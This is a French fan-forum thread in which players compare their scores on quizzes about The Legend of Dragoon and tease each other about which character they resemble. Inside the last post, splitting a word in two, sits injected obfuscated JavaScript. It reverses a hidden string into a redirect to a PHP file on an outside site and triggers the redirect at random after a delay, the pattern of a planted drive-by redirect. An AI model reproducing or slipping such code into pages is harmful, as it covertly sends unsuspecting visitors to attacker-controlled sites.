Sympa ces ptis quizz, le premier j'ai fait 100% en 42 secondes. Selon le deuxième, je ressemblerait plus à Albert... je me disais aussi que j'avais un pti truc Royal, LOL. Bon allez je me suis bien amusé et je ferais les autres demain.
Test 4, je suis encore Lavitz. Le vert me va si bien. Test 5, oh je suis Dart?? Test 6, 7 bonnes réponses sur 8, oups! Test 7, là je m'effondre, 3 bonnes réponses sur 10. Il faudrait que je refasse le jeu. Au final j'ai pris du plaisir et c'est l'éssentiel.
Ouais Gatsu, quand on voit ton Avatar on se dit qu'il y a un truc vachement viril chez toi, d'où Kongol. Mais sous la carapace il y a un peu plus de fragilité, d'où Rose. Même si pour une femme elle reste une dur à cuir. Voilà ma psychanalise à 2 balles mdr
Et techniquement tu n'as pas faux ^^ car le personnage de mon avatar est un gr$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and tourmenté ! De plus il est aussi un homme qui bat des demi dieux donc bon .